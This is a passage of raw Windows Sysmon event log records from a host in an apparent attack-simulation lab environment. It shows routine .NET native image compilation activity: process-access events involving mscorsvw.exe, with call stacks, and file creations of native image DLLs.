indows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:18.765{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1264-0\System.Deployment.dll2021-01-18 13:47:18.765 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:19.203{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:19.187{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:19.187{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:24.984{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1108-0\System.Design.dll2021-01-18 13:47:24.984 10341000x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.562{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.484{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7202-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.484{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7202-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7202-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:25.421{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\844-0\System.Device.dll2021-01-18 13:47:25.421 10341000x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.343{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.328{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.328{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.296{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7002-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7002-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.281{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7002-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7802-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7802-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.937{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7802-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:26.874{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\117c-0\System.Drawing.Design.dll2021-01-18 13:47:26.874 10341000x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.703{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.703{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.656{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.656{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 